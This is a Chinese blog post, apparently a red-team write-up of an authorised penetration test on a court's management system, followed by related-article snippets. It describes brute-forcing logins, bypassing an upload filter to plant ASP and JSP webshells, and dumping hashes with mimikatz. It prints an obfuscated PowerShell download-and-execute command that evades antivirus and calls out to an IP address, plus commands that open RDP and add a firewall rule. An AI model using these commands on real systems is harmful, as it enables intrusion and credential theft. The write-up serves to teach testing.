RT对某法院授权渗透测试

VSole2022-08-14 09:03:51

目标站点是某法院的科技法庭管理系统

在登录的时候发现存在用户名遍历漏洞

用burp的username字典爆破除了存在的用户名 再根据自用的字典成功爆破出了后台用户

所以说打红队的时候弱口令是YYDS

第二部进入后台找上传点,进入用户特有的法院助手系统

没有出现图片上传点,但有doc文档上传点

开始的目标重心是关注后缀是否可控,大小写绕过,%00绕过均没有成功响应,直接乱输一个后缀名,发现依然没有回应。莫非是白名单过滤?正常的doc是能够返回路径的,访问url直接下载文件。

在上面图片的中template找到了突破口,我发现更改template (模板)的值后,文件的回显目录发生了变化,猜测该系统是根据文件类型来定义上传保存目录,doc是默认保存在静态目录下的,于是将改成asp后缀,在对应在文件名修改成asp,成功回显目录,拿下webshell

然而觉得一切开始好起来的时候,在上线CS的时候遇到不少问题,因为目标IIS服务器上是部署了火绒的

开始我想直接web投递一句话,发现拒绝访问,应该是被拦截。然后用内存加载shell的方式,上传了加载器和shellcode进行上线,也没有成功,感觉是环境问题,或者火绒直接不准脚本运行?因为我的加载器免杀Win10 360 火绒双开都是能过的。

既然说不允许访问powershell,考虑应该是权限问题,于是将重心放在了提权上面,之前的思路是上线CS方便横向渗透,顺便跑一波提权脚本,但是现在这条路应该走不下去了,低权限的webshell,还有火绒拦截,应该比较麻烦,这里抛砖引玉,希望大佬有更好的解决办法。

我是直接陷入了困境,开始访问目标机器上的一些配置文件,比如其他旁站,比如sql的账号密码之类的,结果我意外的发现了tomcat/webapp/doc,这不是tomcat吗?

为了验证目标机器搭载了tomcat服务,我访问了对应web,发现确实存在,喜出望外,在webapp下写入了jsp木马,成功拿下管理员权限,为了进一步dumphash,开3389,用unicode加密的powershell绕过了火绒成功上线。

powshell代码参考以下

cmd /c echo set-alias -name xz -value IEX;x^z (New-Object "NeT.WeBClienT").d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://1’+'1.111.11.1:80'+'/a') | p^o^w^e^r^s^h^e^l^l 

需要提权在cs的web投递做好设置。

之后用mimikatz和CS的hashdump导出了管理员密码,执行命令关闭防火墙,成功连接3389。

启动3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

加防火墙规则

netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=338

远程之后把火绒关了,之后的路就好走多了 上传fscan进行内网大保健

跑了一堆打印机和未授权弱口令等等

不过多说明

因为该服务器没有其他网卡的机器,也不能通过内网web和ftp等方式进一步拿下同网段其他IP, 所以就把这些攻击结果截图提交了

最后我发现,其实之前不一定非得上线CS,因为蚁剑的后渗透框架也是非常强大的,可以直接通过他的反弹shell模块成功上线到MSF

而且不会报毒,火绒是没有拦截的

但是至于提权,肯定是没有tomcat提权舒服的 也可以通过MSF拿下webshell之后代理然后去穿内网。也是一种思路吧。

渗透测试火绒
本作品采用《CC 协议》,转载必须注明作者和本文链接
钓鱼常用手法总结
2022-03-24 13:48:29
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
渗透测试Tips
2022-04-13 06:38:50
知己知彼,百战不殆1、如果提示缺少参数,如{msg:params error},可尝使用字典模糊测试构造参数,进一步攻击。
正常的doc是能够返回路径的,访问url直接下载文件。为了验证目标机器搭载了tomcat服务,我访问了对应web,发现确实存在,喜出望外,在webapp下写入了jsp木马,成功拿下管理员权限,为了进一步dumphash,开3389,用unicode加密的powershell绕过了火绒成功上线。
0x01前言 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 0x02 内网渗透 利用shiro rce拿到shell上线CS
这样就获取了system权限,接下来就是对机器进行信息搜集,获取对我们横向渗透有帮助的信息。其中记录了tomcat部署的路径,以及备份的源码文件。经过一番爆破,发现了一台机器oracle数据库system用户密码未修改,为manager。大家应该知道oracle数据库是可以执行系统命令的,而system用户完全符合执行系统命令的条件。后面发现是火绒拦截了异常行为。
接口未授权在尝是了一波js接口后没有发现什么漏洞,但是查找到了一些信息泄露。sql注入(两枚)在刚刚注册了用户,登录进去。第一处将url和参数进行拼接。第二处第二处同样是js文件内找到。在图片中间的地方插入xss语句但是如果没有找到可以注册的api,则这个漏洞无法利用,为了扩大漏洞危害,尝试删除cookie,是否可以未授权文件上传。
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!0x00 前言对国外某地产公司的一次测试测试过程中每一步都有阻碍,不像以往的一帆风顺,对其中涉及的一些点进行一个简单的记录,码较厚,见谅。
0x01 前言我们在渗透测试过程中时常会用到一些脚本,而现在大部分的WAF或杀软都会根据一些危险组件名、特定字符做为特征来查杀,只要找到其特征,我们可以使用简单的混淆、拼接等方式来进行免杀。
基于Windows打造的一个渗透测试套件工具包,非常不错的一个项目,有喜欢的可以点个Star支持一下,有问题也可以提交Issues反馈!
VSole
网络安全专家